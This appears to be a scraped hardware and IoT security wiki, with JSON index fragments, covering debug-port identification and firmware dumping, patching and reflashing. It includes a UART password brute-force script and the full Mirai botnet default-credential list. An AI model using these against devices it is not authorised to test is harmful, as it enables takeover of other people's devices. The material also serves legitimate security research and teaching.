Welcome to our comprehensive Hardware Security Wiki, a curated collection of valuable payloads and bypass techniques tailored for Hardware and IoT Security. This repository serves as a dynamic and collaborative space, encouraging contributions from security enthusiasts and professionals alike.
Our goal is to foster a community-driven platform where individuals can share, learn, and enhance their skills in hardware and IoT security. Whether you are a seasoned security expert or just starting, this repository is designed to provide you with a wealth of knowledge and practical insights.
Informations from this repository is very dense, you may encounter information overflow
"},{"location":"#contribute-and-collaborate","title":"Contribute and Collaborate","text":"We believe in the power of community and collective knowledge. Therefore, we warmly invite you to contribute your unique payloads, bypass techniques, and innovative strategies to enrich our repository. Your contributions help keep this project alive and kicking, ensuring that we can continue to bring you the latest and greatest in hardware and IoT security.
You can also share the project and contribute with a Github Sponsorship.
"},{"location":"debug-interfaces/jtag/","title":"JTAG","text":""},{"location":"debug-interfaces/jtag/#summary","title":"Summary","text":"Allows testing, debugging, firmware manipulation and boundary scanning
TCK: Test Clock The drummer, or metronome that dictates the speed of the TAP controller. Voltage on this pin simply pulses up and down in a rhythmic, steady beat. On every \u201cbeat\u201d of the clock, the TAP controller takes a single action. The actual clock speed is not specified in the JTAG standard. The TAP controller accepts its speed from the outside device controlling JTAG.
TMS: Test Mode Select Voltages on the Mode Select pin control what action JTAG takes. By manipulating the voltage on this pin, you tell JTAG what you want it to do.
TDI: Test Data-In The pin that feeds data into the chip. The JTAG standard does not define protocols for communication over this pin. That is left up to the manufacturer. As far as JTAG is concerned, this pin is simply an ingress method for 1s and 0s to get into the chip. What the chip does with them is irrelevant to JTAG.
TDO: Test Data-Out The pin for data coming out of the chip. Like the Data-In pin, communication protocols are not defined by JTAG. TRST: Test Reset (Optional) This optional signal is used to reset JTAG to a known good state, we'll explain why this is optional in a few paragraphs.
AVR has lock bits that protects device from extracting flash
# Read fuses and lock bits using avarice \u2013r\n$ avarice --program --file test.elf --part atmega128 --jtag /dev/ttyUSB0 :4444\n# Acquire firmware using avrdude\n$ avrdude -p m128 -c jtagmkI \u2013P /dev/ttyUSB0 -U flash:r:\u201d/home/avr/flash.bin\":r\nFor enumeration methods see Enumeration/JTAG
"},{"location":"debug-interfaces/jtag/#references","title":"References","text":"JTAG and SWD are similar and can be interfaced with each other:
JTAG Mode SWD Mode Signal TCK SWCLK Clock into the core TDI - JTAG test data input TDO SWV JTAG Test data output / SWV trace data output TMS SWDIO JTAG test mode select / SWD data in and out GND GND -"},{"location":"debug-interfaces/swd/#references","title":"References","text":"UART stands for Universal asynchronous receiver transmitter. Used for serial communications over a computer or peripheral device serial port.
UART peripherals are commonly integrated into many embedded devices. UART communication makes use of baud rate to maintain synchronism between two devices. The baud rate is the rate at which information is transferred in a communication channel.
With access to the UART, a user can see the bootloader and operating system logs.
Generally, the line is held high (at a logical 1 value) while UART is in idle state.
We call the most common configuration 8N1: eight data bits, no parity, and 1 stop bit.
"},{"location":"debug-interfaces/uart/#identifying-uart-ports","title":"Identifying UART ports","text":"A UART pinout has four ports:
To find UART there are multiple solutions:
Keep in mind that some devices emulate UART ports by programming the General-Purpose Input/Output (GPIO) pins if there isn't enough space on the board for dedicated hardware UART pins.
It is advised to capture the communication at 4 times the baudrate speed, to avoid decoding issues.
"},{"location":"debug-interfaces/uart/#using-a-multimeter","title":"Using a multimeter","text":""},{"location":"debug-interfaces/uart/#gnr-pin","title":"GNR pin","text":"First, identify the GND pin by using the multimeter in continuity mode.
Place the black probe on any grounded metallic surface, be it a part of the tested PCB or not. Then place the red probe on each of the ports. When you hear a beeping sound, you found a GND pin.
"},{"location":"debug-interfaces/uart/#vcc-pin","title":"VCC pin","text":"Turn the multimeter to the DC voltage mode and set it up to 20V of voltage. Keep the black probe on a grounded surface. Place the red probe on a suspected pin and turn on the device.
If the multimeter measures a constant voltage of either 3.3V or 5V, you've found the VCC pin.
"},{"location":"debug-interfaces/uart/#tx-pin","title":"TX pin","text":"Keep the multimeter mode at DC voltage of 20V or less, and leave the black probe on a grounded surface. Move the red probe to the suspected pin and power cycle the device. If the voltage fluctuates for a few seconds and then stabilizes at the VCC value, you've most likely found the TX pin.
This behavior happens because, during bootup, the device sends serial data through that TX pin for debugging purposes. Once it finishes booting, the UART line goes idle.
"},{"location":"debug-interfaces/uart/#rx-pin","title":"Rx pin","text":"If you've already identified the rest of the UART pins, the nearby fourth pin is most likely the RX pin.
Otherwise, you can identify it because it has the lowest voltage fluctuation and lowest overall value of all the UART pins.
"},{"location":"debug-interfaces/uart/#using-a-logic-analyzer","title":"Using a logic analyzer","text":"A logic analyzer is an electronic instrument that captures and displays multiple signals from a digital system or digital circuit.
To find the UART pins we will connect the pins to a logic analyzer and look for data being transmitted.
"},{"location":"debug-interfaces/uart/#hardware-setup","title":"Hardware setup","text":"Make sure any system you're testing is powered off when you connect the logic analyzer's probes to it to avoid short-circuiting.
In order to make Pulseview work on Windows host, you have to use Zadig driver: https://zadig.akeo.ie/
Once you get an interesting capture, it is possible to save it and decode it using sigrok-cli, instead of PulseView GUI :
sigrok-cli -O ascii -i ./uart.sr -P uart:baudrate=115200:rx=D0 -B uart=rx\nThis setup is for Saleae-based logic analyzer if you use a different one, refer to the constructor documentation.
If you want to modify the speed and the duration:
Now try with the popular baud rates with both the suspected pins and try to compare the results. If you find any readable text with one of the pins and the text makes some sense then that\u2019s the TX pin.
"},{"location":"debug-interfaces/uart/#connect-to-serial-port","title":"Connect to serial port","text":""},{"location":"debug-interfaces/uart/#warning","title":"WARNING","text":"It's not a big deal if you confuse the UART RX and TX ports with each other, because you can easily swap the wires connecting to them without any consequences. But confusing the VCC with the GND and connecting wires to them incorrectly might fry the circuit.
"},{"location":"debug-interfaces/uart/#examples","title":"Examples","text":""},{"location":"debug-interfaces/uart/#connection-using-a-usb-to-ttl","title":"Connection using a USB to TTL","text":"Once the ports are connected, plug the adapter into your computer. You now need to find the device file descriptor. To do that, enter the following command: sudo dmesg.
Typically, it will be assigned to /dev/ttyUSB0 if you don't have any other peripheral devices attached.
Under Ubuntu or Debian, a non-root user cannot have access to serial ports such as ttyS0 or ttyUSB0 if he is not a member of the dialout group! The equivalent group on Arch-based distributions is uucp. In other words, you just have to add yourself to this group to have access.
sudo usermod -a -G dialout $USERsudo usermod -a -G uucp $USERThe most common baud rates for UART are 9600, 19200, 38400, 57600 and 115200.
A table of other used but less common baud rates can be found here: Here
"},{"location":"debug-interfaces/uart/#autodetect-the-baud-rate-using-a-script","title":"Autodetect the baud rate using a script","text":"# Download the script\nwget https://raw.githubusercontent.com/devttys0/baudrate/master/baudrate.py\n\n# Install serial dependency\npip2.7 install serial\n\n# Run the script on \"/dev/ttyUSB0\"\npython2.7 baudrate.py -p /dev/ttyUSB0\nIt is possible to get baudrate using the duration of a bit periode, using PulseView or any other bus analysis tools :
# https://www.cuemath.com/frequency-formula/\n>>> 1/8.003e-6 \n124953.14257153569\nThe closest common baudrate is : 115200. Configure the decoder and you should see ascii chars :
"},{"location":"debug-interfaces/uart/#interact-with-uart","title":"Interact with UART","text":"Command line tools to interact with UART:
cu -l /dev/ttyUSB0 -s 115200\nmicrocom -d -s 115200 -p /dev/ttyUSB0\nminicom -b 115200 -o -D /dev/ttyUSB0 # To exit GNU screen, type Control-A k\nscreen /dev/ttyUSB0 115200\nBrute force a password protected UART:
import serial, time\nport = \"/dev/ttyUSB0\"\nbaud = 115200\ns = serial.Serial(port)\ns.baudrate = baud\n\nwith open('/home/audit/Documents/IOT/passwords.lst', 'r') as f:\n lines = f.readlines()\n\n for pwd in lines:\n a = s.write(pwd.strip())\n print(\"Pwd: {}\".format(pwd.strip()))\n print(\"Sent {} bytes\".format(a))\n print(\"Result: {}\".format(s.readline()))\n time.sleep(10)\nInteract with HydraBus
uart1> scan\nuart1> show\nuart1> speed 38400\nuart1> bridge\nIt\u2019s an emulation of serial port over BLE. The UUID of the Nordic UART Service is 6E400001-B5A3-F393-E0A9-E50E24DCCA9E. This service exposes two characteristics: one for transmitting and one for receiving.
filetype:pdf <reference number>Electromagnetic/Radio Frequency Shield should be removed to see what it is hidding.
"},{"location":"enumeration/fcc-id/","title":"FCC ID","text":""},{"location":"enumeration/fcc-id/#searchable-fcc-id-database","title":"Searchable FCC ID Database","text":"An FCC ID is a unique identifier assigned to a device registered with the United States Federal Communications Commission.
For legal sale of wireless deices in the US, manufacturers must:
Sometimes when you have no idea what's the pinout of the JTAG port, you have to find a way to correctly identify each of the JTAG pins. There are few ways to do that, one of them is by \"bruteforcing\" the pins for IDCODE or BYPASS JTAG commands.
There are several tools and ways to enumerate JTAG pins. Here are few:
JTAGscan iterates over all defined pins (currently for RP2040, the first 16 pins) searching for TMS, TCK, TDO and TDI.
It has two approaches:
IDCODE - Only requires TMS, TCK and TDO so it's faster. Unfortunately not all devices support IDCODE command (although most of them do). This doesn't find the TDI pin.BYPASS mode. This can find all pins, but it is slower (since not only you have one more pin to iterate over, but also need to shift \"enough\" bits through the JTAG Chain).Any raspberry pi pico board should work fine for scanning JTAG ports. Make sure you check the VCC of the target to see if it is 3.3V. Being other voltage level will require a level-shifter to avoid damage.
It is also recommended to use series 33 Ohm resistors in series with every tested pin to avoid short circuiting if some pin you're testing is an output.
"},{"location":"enumeration/jtag/#programming-the-pipico","title":"Programming the PiPico","text":"Releases and download the jtagscan-xxxx.zipuf2 fileuf2 file to the diskOpen the detected serial port in your favorite serial terminal application (for example, PuTTY)
Hit the key h to show the help.
+-------------------------------+\n| JTAGscan Jtag Pinout Finder |\n+-------------------------------+\n a - Automatically find all pins\n i - IDCODE search for pins\n b - BYPASS search for pins\n t - TDI-only BYPASS search\n m - set pin mask, current: 0xFFFF\n d - set debug level: 1\n c - half cycle us, current: 32\n h - print this help\n+-------------------------------+\nHit a for scan the JTAG pins. This will do first a IDCODE scan and then a BYPASS scan. Depending on how many pins are in pin mask field (you can change it by using m) it should take a while. When successfully, the scanner will stop with a message like this one:
Automatically searching\n+-- Starting with IDCODE scan --+\n| TCK | TMS | TDO | IDCODE |\n+-------------------------------+\n| 2 | 3 | 0 | cba00477 |\n+----------- SUCCESS -----------+\n TCK, TMS, and TDO found.\n\n+-- BYPASS searching, just TDI -+\n| TCK | TMS | TDO | TDI | Width |\n+-------------------------------+\n| 2 | 3 | 0 | 1 | 31 |\n+----------- SUCCESS -----------+\nJTAGenum is an open source Arduino JTAGenum.ino or RaspbberyPi JTAGenum.sh (experimental) scanner. This code was built with three primary goals:
\u26a0\ufe0f JTAG and device must share the same ground.
Software Connection Set up:
Arduino PIN Layout
Using avrdudes/avrdude
# send raw data firmware\n$ avrdude -p m328p -c usbasp -P /dev/ttyUSB0 -b 9600 -U flash:w:flash_raw.bin\n\n# send ihex firmware\n$ avrdude -c arduino -p atmega328p -P /dev/ttyUSB* -b115200 -u -V -U flash:w:CHALLENGE.hex\n$ avrdude -c usbasp -p m328p -F -U flash:r:dump.hex:i\n\n# default\n$ avrdude -c usbasp -p m328p -C /etc/avrdude.conf -U flash:w:hardcodedPassword.ino.arduino_standard.hex\nUsing raspberrypi/picotool
# extension indicates the type (bin, uf2)\npicotool load firmware.bin\nUsing avrdudes/avrdude
$ avrdude -p m328p -c usbasp -P /dev/ttyUSB0 -b 9600 -U flash:r:flash_raw.bin:r\n$ avrdude -p m328p -c arduino -P /dev/ttyACM0 -b 115200 -U flash:r:flash_raw.bin:r\n$ avrdude -p atmega328p -c arduino -P/dev/ttyACM0 -b 115200 -D -U flash:r:program.bin:r -F -v \nUsing openocd-org/openocd
dump_img.cfg: init\nreset init\nhalt\ndump_image image.bin 0x00000000 0x00040000\nexit\nsudo openocd -f /home/maki/tools/hardware/openocd/tcl/interface/stlink-v2-1.cfg -f /home/maki/tools/hardware/openocd/tcl/target/nrf51.cfg -f dump_fw.cfg\nUsing raspberrypi/picotool
# PicoSDK\ngit clone https://github.com/raspberrypi/pico-sdk.git\ncd pico-sdk\ngit submodule update --init\n\n# Picotool\ncd ..\ngit clone https://github.com/raspberrypi/picotool.git\ncd picotool\nmkdir build\ncd build\ncmake -DPICO_SDK_PATH=../pico-sdk ..\nmake\nsudo ./picotool save -F /tmp/out.bin\nSaving file: [==============================] 100%\nWrote 73312 bytes to /tmp/out.bin\n\nsudo ./picotool save --all -F /tmp/out2.bin\nSaving file: [==============================] 100%\nWrote 2097152 bytes to /tmp/out2.bin\nUsing flashrom/flashroom
sudo apt-get install build-essential pciutils usbutils libpci-dev libusb-dev libftdi1 libftdi-dev zlib1g-dev subversion libusb-1.0-0-dev\nsvn co svn://flashrom.org/flashrom/trunk flashrom\ncd flashrom\nmake\n\nflashrom -p ft232_spi:type:232h -r spidump.bin\nflashrom -p linux_spi:dev=/dev/spidev0.0,spispeed=512 -r spi_dump.bin\nflashrom -p serprog:dev=/dev/ttyACM0,spispeed=160k -r dump_spi.bin -c \"MX25L6406E/MX25L6408E\"\nUsing HydraBus: hydrabus/hydrafw/hydra_spi_dump.py
./hydra_spi_dump.py firmware.bin 1024 0x000000 fast\nThe Intel HEX is a transitional file format for microcontrollers, (E)PROMs, and other devices. The documentation states that HEXs can be converted to binary files and programmed into a configuration device.
Each line in the ihex file starts with :
Convert .hex(ihex format) to .elf file with avr-objcopy or with an online tool http://matrixstorm.com
$ avr-objcopy -I ihex -O elf32-avr dump.hex dump.elf\n# or \n$ objcopy -I ihex chest.hex -O binary chest.bin ; xxd chest.bin\nAlternative with Python bincopy
import bincopy\nimport sys\n\nf = bincopy.BinFile()\nf.add_ihex_file(sys.argv[1])\nprint(f.as_binary())\nQuick strings on .hex
cat defaultPassword.ino.arduino_standard.hex | tr -d \":\" | tr -d \"\\n\" | xxd -r -p | strings \nInspect the assembly with avr-objdump -m avr -D chest.hex.\\ Emulate : qemu-system-avr -S -s -nographic -serial tcp::5678,server=on,wait=off -machine uno -bios chest.bin
unix/strings
$ strings file.bin\n\n$ strings -e l file.bin\nThe strings -e flag specifies the encoding of the characters. -el specifies little-endian characters 16-bits wide (e.g. UTF-16)\n\n$ strings -tx file.bin\nThe -t flag will return the offset of the string within the file. -tx will return it in hex format, T-to in octal and -td in decimal.\nunix/dd
$ dd if=firmware.bin of=firmware.chunk bs=1 skip=$((0x200)) count=$((0x400-0x200))\nIf we wanted to run it a little faster, we could increase the block size:\n$ dd if=firmware.bin of=firmware.chunk bs=$((0x100)) skip=$((0x200/0x100)) count=$(((0x400-0x200)/0x100))\nReFirmLabs/binwalk
$ binwalk -Me file.bin\n$ binwalk -Y dump.elf \nDECIMAL HEXADECIMAL DESCRIPTION\n--------------------------------------------------------------------------------\n3708 0xE7C ARM executable code, 16-bit (Thumb), little endian, at least 522 valid instructions\nonekey-sec/unblob
docker run --rm --pull always -v /path/to/extract-dir/on/host:/data/output -v /path/to/files/on/host:/data/input ghcr.io/onekey-sec/unblob:latest /data/input/path/to/file\ndocker run --rm --pull always ghcr.io/onekey-sec/unblob:latest --help\nsquashfs-tools/unsquashfs
sudo unsquashfs -f -d /media/seagate /tmp/file.squashfs\nonekey-sec/jefferson - JFFS2 filesystem extraction tool
pip install jefferson\njefferson filesystem.img -d outdir\njefferson file.jffs2 -d jffs2\nwhataday/unyaffs - YAFFS2 filesystem extraction tool
unyaffs [-l <layout>] [-t] [-v] [-V] <image_file_name> [<base dir>]\n -l <layout> set flash memory layout\n layout=0: detect chunk and spare size (default)\n layout=1: 2K chunk, 64 byte spare size\n layout=2: 4K chunk, 128 byte spare size\n layout=3: 8K chunk, 256 byte spare size\n layout=4: 16K chunk, 512 byte spare size\n -t list image contents\n -v verbose output\n -V print version\nRepack firmware
mksquashfs4 squashfs-root myrootfs {options}\ndd if=myrootfs of=dump/bin bs=1 seek=<offset> conv=notrunc\nFlashrom write
flashrom -p ft2232_spi:type=232H -w dump.bin\nSREC - Motorola S-Record : All S-record file lines start with a capital S.Intel HEX lines all start with a colon.TI-TXT is a Texas Instruments format, usually for the MSP430 series. Memory addresses are prepended with an @, and data is represented in hex.Raw NAND dumpsHigh entropy = probably encrypted (or compressed). Low entropy = probably not
$ binwalk -E fw\nTODO
"},{"location":"firmware/firmware-dumping/#references","title":"References","text":"Requirements:
\u26a0\ufe0f For ARM Arduino firwmare the entry point is located at _RESET interruption.
To load it properly in IDA, open the file, select ATMEL AVR and then select ATmega323_L.
Radare2 can disassemble avr, arduino natively
$ radare2 -A -a arm -b 32 ihex://Challenge_v3.hex\n[x] Analyze all flags starting with sym. and entry0 (aa)\n[x] Analyze function calls (aac)\n[x] find and analyze function preludes (aap)\n[x] Analyze len bytes of instructions for references (aar)\n[x] Check for objc references\n[x] Check for vtables\n[x] Finding xrefs in noncode section with anal.in=io.maps\n[x] Analyze value pointers (aav)\n[x] Value from 0x00000000 to 0x10001018 (aav)\n[x] 0x00000000-0x10001018 in 0x0-0x10001018 (aav)\n[x] Emulate code to find computed references (aae)\n[x] Type matching analysis for all functions (aaft)\n[x] Propagate noreturn information\n[x] Use -AA or aaaa to perform additional experimental analysis.\n\n[0x565e8640]> aaaa\n[0xf7723a20]> afl\n[0xf7723a20]> e asm.describe = true\n[0xf7723a20]> s main\n[0x0804873b]> pdf\n\nTo perform a case-insensitive search for strings use /i:\n[0x0001d62c]> /i Exploding\nSearching 9 bytes in [0x0-0x10001018]\nhits: 1\n0x0003819e hit1_0 .. N# NExploding Firmware ! N.\n\n$ r2 -a avr /tmp/flash\n[0x000000c4]> afr\n[0x000000c4]> pd 17\n\n$ rasm2 -a avr -d \"0c94 751b 0c94 9d1b 0c94 d72c\" \njmp 0x36ea\njmp 0x373a\njmp 0x59ae\nSVD-Loader for Ghidra automates the entire generation of peripheral structs and memory maps for over 650 different microcontrollers
Usage
ESP8266 and ESP32 serial bootloader utility : espressif/esptool
josh@ioteeth:/tmp/reversing$ ~/esptool/esptool.py image_info recovered_file\nesptool.py v2.4.0-dev\nImage version: 1\nEntry point: 4010f29c\n1 segments\nSegment 1: len 0x00568 load 0x4010f000 file_offs 0x00000008\n$ python3 nrfident.py bin firmwares/s132.bin\nBinary file provided firmwares/s132.bin\nComputing signature from binary\nSignature: d082a85351ee18ecfdc9dcb01352f5df3d938a2270bcadec2ec083e9ceeb3b1e\n=========================\nSDK version: 14.0.0\nSoftDevice version: s132\nNRF: nrf52832\n=========================\nSDK version: 14.1.0\nSoftDevice version: s132\nNRF: nrf52832\nSoftDevice : s132\nCard version : xxaa\n *****\nRAM address : 0x20001368\nRAM length : 0xec98\nROM address : 0x23000\nROM length : 0x5d000\navr-objdump \u2013 gcc kit standard tool
$ avr-objdump -l -t -D -S main.bin > main.bin.dis\n$ avr-objdump -m avr -D main.hex > main.hex.dis\nPrograms compiled for Arduino can be simulated using AVR Studio or the newer Atmel Studio. I have used the former along with hapsim. Hapsim works by hooking into AVR Studio and can simulate peripherals like the UART, LCD etc.
$ simulavr -P atmega128 -F 16000000 \u2013f build-crumbuino128/ex1.1.elf\nParse BIOS/Intel ME/UEFI firmware related structures: Volumes, FileSystems, Files, etc - theopolis/uefi-firmware-parser
sudo pip install uefi_firmware\n$ uefi-firmware-parser --test ~/firmware/*\n~/firmware/970E32_1.40: UEFIFirmwareVolume\n~/firmware/CO5975P.BIO: EFICapsule\n~/firmware/me-03.obj: IntelME\n~/firmware/O990-A03.exe: None\n~/firmware/O990-A03.exe.hdr: DellPFS\nBruschetta is the latest board to interact with Hardware, it is an upgraded version of these projects.
cd Bus_Pirate/package/BPv4-firmware/pirate-loader-v4-source/pirate-loader_lnx\nsudo ./pirate-loader_lnx --dev=/dev/ttyACM0 --hex=../BPv4-firmware-v6.3-r2151.hex\nDump firmware over SPI using a Bus Pirate
# Identify EEPROM chip\nsudo flashrom -p buspirate_spi:dev=/dev/ttyUSB0\n\n# Dump firmware using a bus pirate (SPI)\nsudo flashrom -p Buspirate_spi:dev=/dev/ttyUSB0,spispeed=1M -c (Chip name) -r (Name.bin)\nhttps://github.com/plumbum/ch341eeprom
sudo apt install git make libusb-1.0-0-dev clang\ngit clone https://github.com/plumbum/ch341eeprom.git\nmake\n./ch341eeprom -v -s 24c05 -r dump.bin\nsudo flashrom -V --programmer ch341a_spi -r dump.bin\nsudo flashrom -V --programmer ch341a_spi -r dump.bin -c W25Q16.V # Specify the chip\nESP32 and ESP8266 share almost the same architecture.
"},{"location":"gadgets/esp32/#tools","title":"Tools","text":"The ESP32 microprocessor uses the Xtensa instruction set, use Tensilica Xtensa 32-bit little-endian in Ghidra.
Flash a new firmware with espressif/esptool
esptool.py -p /dev/ttyUSB0 -b 460800 --before default_reset --after hard_reset --chip esp32 write_flash --flash_mode dio --flash_size 2MB --flash_freq 40m 0x1000 build/bootloader/bootloader.bin 0x8000 build/partition_table/partition-table.bin 0x10000 build/ble_ctf.bin\nesptool.py -p /dev/ttyS5 -b 115200 --after hard_reset write_flash --flash_mode dio --flash_freq 40m --flash_size detect 0x8000 build/partition_table/partition-table.bin 0x1000 build/bootloader/bootloader.bin 0x10000 build/esp32-wifi-penetration-tool.bin\nFlash a new firmware with scientifichackers/ampy (MicroPython)
ampy --port /dev/ttyUSB0 put bla.py\nDump the flash
esptool -p COM7 -b 115200 read_flash 0 0x400000 flash.bin\nDissect the flash
python esp32knife.py --chip=esp32 load_from_file ./flash.bin\nFlash the new firmware
# repair the checksum\npython esp32fix.py --chip=esp32 app_image ./patched.part.3.factory \nesptool -p COM7 -b 115200 write_flash 0x10000 ./patched.part.3.factory.fixed\nMAC addresses from IEEE for Flipper Zero: 0C:FA:22:XX:XX:XX. This applies to Bluetooth, Ethernet, WiFi interfaces.
0C-FA-22 (hex) FLIPPER DEVICES INC\n0CFA22 (base 16) FLIPPER DEVICES INC\n 2803 Philadelphia Pike Suite B #551\n Claymont 19703\n US\nThe Facedancer21 is the twenty-fourth hardware revision of the GoodFET, owing its heritage to the GoodFET41 and Facedancer20. Unlike the general-purpose GoodFET boards, the only purpose of this board is to allow USB devices to be written in host-side Python, so that one workstation can fuzz-test the USB device drivers of another host.
"},{"location":"gadgets/goodfet/#references","title":"References","text":"Support many extensions:
External interactions:
Detailed steps: hydrafw/Getting-Started-with-HydraBus-flash-and-use-hydrafw-on-linux
Install dfu-util
git clone git://git.code.sf.net/p/dfu-util/dfu-util dfu-util\ncd dfu-util\n./autogen.sh\n./configure\nsudo make install\nDownload the latest release of the firmware
wget https://github.com/hydrabus/hydrafw/releases/download/v0.11/build_HydraFW_v0.11-12-ga6019f4_HydraBus_HydraNFC.zip\nwget https://raw.githubusercontent.com/hydrabus/hydrafw/master/utils/udev-rules/09-hydrabus.rules -O ~/hydrafw/09-hydrabus.rules\nKeep pressing UBTN button at PowerON/RESET in order to enter USB DFU
sudo dfu-util -lsudo dfu-util -i 0 -a 0 -d 0483:df11 -D ./build/hydrafw.dfuBasic info: show system
ps1> show system HydraFW (HydraBus) v0.11-1-g4d74500 2023-05-09 sysTime: 0x000d82dd. cyclecounter: 0x76ac02b9 cycles. cyclecounter64: 0x0000000076ac02cb cycles. 10ms delay: 1680035 cycles.
Determine the port name: ls -l /dev/tty*
screen /dev/ttyACM0spishow pinsExamples:
[ 0x9F r:3 ][ 0x03 0x00:3 hd:32 ]Designed to dump Flash NAND chips
"},{"location":"gadgets/hydraflash/#usage","title":"Usage","text":"pip install git+https://github.com/hydrabus/DumpFlash-Hydrabus\npython2 DumpFlash.py -d /dev/hydrabus -i\nUsing console, type nfc + Enter to enter NFC mode dedicated to HydraNFC Shield v2.
> nfc\nNFCv2> nfc-all\nNFCv2> show\nNFCv2> nfc-all scan\nHydraUSB3 (WCH CH569) open source test firmware / examples / libraries to experiment with streaming / high-speed protocols (USB2 HS, USB3 SS, HSPI, SerDes...)
Warning It is MANDATORY to buy a \u201cUSB 3 Type A male to USB 3 Type A male cable\u201d (the cable shall have Power+Data with USB2 and USB3 SS signals)
"},{"location":"gadgets/hydrausb3/#firmware-flashing","title":"Firmware Flashing","text":"Linux
Windows (requires MSYS2/MINGW64)
iCopy-X is a \"super\" automated handheld RFID copier based on Proxmark3. iCopy-X can read, crack, duplicate, sniff and simulate without the use of a PC.
Latest firmware: 1.0.90 2022-08-16
Step 1: Enter the device S/N (found under the \u201cAbout\u201d menu) on the website and download the upgrade package to your PC.
Step 2: Connect the iCopy-X to your computer using the supplied USB TYPE C cable and delete any files that end in \u201c.ipk\u201d from the root directory.
Step 3: Copy the newly downloaded upgrade package to the root directory.
Step 4: Press \"Ok\" on the second page of the \"About\" menu on the iCopy-X to start the automatic upgrade.
TIP: Ensure that the serial number has been entered correctly before starting as this could cause the upgrade to fail.
"},{"location":"gadgets/icopy-x/#pc-mode","title":"PC Mode","text":"In PC-Mode, after connecting to the computer, open the client in the built-in U disk, you can directly use the Proxmark3 universal CMD to operate.
COM Port (Check Device Manager, numbers only): 4\n[=] Session log E:/CLIENT_X86/.proxmark3/logs/log_20240730.txt\n[+] loaded from JSON file E:/CLIENT_X86/.proxmark3/preferences.json\n[=] Using UART port /com4\n[=] Communicating with PM3 over USB-CDC\n[usb] pm3 -->\nsigrok/kali-rolling 0.3 all\nLogic analyzer and protocol decoder software suite (metapackage)\n\npulseview/kali-rolling 0.4.2-3+b1 amd64\nsigrok logic analyzer, oscilloscope, and MSO GUI\nscreen /dev/ttyUSB0 19200\nEvil-M5Core2 is an easy Evil portal and rogue app deployement software designed to work on M5Stack Core2.
"},{"location":"gadgets/m5stack/#features","title":"Features","text":"Requirements:
M5Stack boards managerM5Unified libraryInstall:
M5Core2 to your computer.Arduino IDE and load the provided code.M5unified and adafruit_neopixel libraries are installed.esp32 and M5stack board are installed. (Error occur with esp32 3.0.0-alpha3, please use esp32 v2.0.14 and below)M5Core2 device.RT809H with multiple adapters/sockets for eMMC/NAND Flash
"},{"location":"gadgets/micro-bit/","title":"Micro::bit","text":""},{"location":"gadgets/micro-bit/#extract-source-code-from-firmware","title":"Extract source code from firmware","text":"When the source has been build from https://makecode.microbit.org/#editor, the Javascript code is embedded into the firmware.
import bincopy\nimport lzma\nimport sys\nimport subprocess\nimport json\n\n# split firmware into raw and code\nwith open(sys.argv[1],'r') as f:\n fwstring = f.read()\n fwsplit = fwstring.split('\\n\\n')\n\n with open('fw_raw.hex', 'w') as g:\n g.write(fwsplit[0])\n with open('fw_code.hex', 'w') as g:\n g.write(fwsplit[1])\n\n# Convert ihex to bin\nf = bincopy.BinFile()\nf.add_ihex_file('fw_code.hex')\nbinary = f.as_binary()\nprint(\"[+] ihex converted to binary\")\n\n## Extract code firmware, bruteforce offset\nfor i in range(200):\n with open('firmware.bin', 'w+b') as g:\n g.write(binary[i:])\n\n try:\n data = subprocess.run([\"lzma\", \"firmware.bin\", \"-d\", \"--stdout\"], capture_output=True)\n data = data.stdout.decode().split('}',1)\n data = data[1][1:]\n data = json.loads(data)\n print(data)\n print(\"\\n[+] Javascript code\")\n print(data['main.ts'])\n except Exception as e:\n continue\nSolder wires on SWD pins:
Connect to an ST-LINK v2:
"},{"location":"gadgets/micro-bit/#openocd-profile","title":"OpenOCD profile","text":"Official datasheet of the nRF51822:
https://infocenter.nordicsemi.com/pdf/nRF51822_PS_v3.1.pdf
Code section size:
hex(1024*256) = 0x40000 => 0x00040000
init\nreset init\nhalt\ndump_image image.bin 0x00000000 0x00040000\nexit\n$ sudo openocd -f /home/maki/tools/hardware/openocd/tcl/interface/stlink-v2-1.cfg -f /home/maki/tools/hardware/openocd/tcl/target/nrf51.cfg -f dump_fw.cfg\nContent of image.dd file:
$ strings image.bin\n[...]\nmain.py# Add your Python code here. E.g.\nfrom microbit import *\nwhile True:\n display.scroll('Hello, World!')\n displa\ny.show(Image.HEART)\n sleep(1000)\n print(\"coucou\")\n sleep(2000)\nTODO
"},{"location":"gadgets/proxmark/#references","title":"References","text":""},{"location":"gadgets/pwnagotchi/","title":"Pwnagotchi","text":"Documentation: https://pwnagotchi.ai/
"},{"location":"gadgets/raspberry-pi/","title":"Raspberry Pi","text":""},{"location":"gadgets/raspberry-pi/#gpio-header","title":"GPIO Header","text":""},{"location":"gadgets/raspberry-pi/#tools","title":"Tools","text":"IoT Device Default Password Lookup : https://www.defpass.com
"},{"location":"other/default-iot-passwords/#mirai-wordlist","title":"Mirai Wordlist","text":"Seclist Mirai Wordlist : https://raw.githubusercontent.com/danielmiessler/SecLists/master/Passwords/Malware/mirai-botnet.txt
root xc3511\nroot vizxv\nroot admin\nadmin admin\nroot 888888\nroot xmhdipc\nroot default\nroot jauntech\nroot 123456\nroot 54321\nsupport support\nroot (none)\nadmin password\nroot root\nroot 12345\nuser user\nadmin (none)\nroot pass\nadmin admin1234\nroot 1111\nadmin smcadmin\nadmin 1111\nroot 666666\nroot password\nroot 1234\nroot klv123\nAdministrator admin\nservice service\nsupervisor supervisor\nguest guest\nguest 12345\nadmin1 password\nadministrator 1234\n666666 666666\n888888 888888\nubnt ubnt\nroot klv1234\nroot Zte521\nroot hi3518\nroot jvbzd\nroot anko\nroot zlxx.\nroot 7ujMko0vizxv\nroot 7ujMko0admin\nroot system\nroot ikwb\nroot dreambox\nroot user\nroot realtek\nroot 000000\nadmin 1111111\nadmin 1234\nadmin 12345\nadmin 54321\nadmin 123456\nadmin 7ujMko0admin\nadmin pass\nadmin meinsm\ntech tech\nmother fucker\nRequirements and configuration for Kali Linux.
$ sudo apt-get install bluetooth blueman bluez\n$ sudo systemctl start bluetooth\n$ sudo hciconfig hci0 up\nEnumerate Bluetooth devices
$ sudo hcitool lescan\n00:1A:7D:DA:71:06 Ph0wn Beacon\n25:55:84:20:73:70 (unknown)\n[!CAUTION] apt doesn't have a recent version of bluez, recompile it with the following lines.
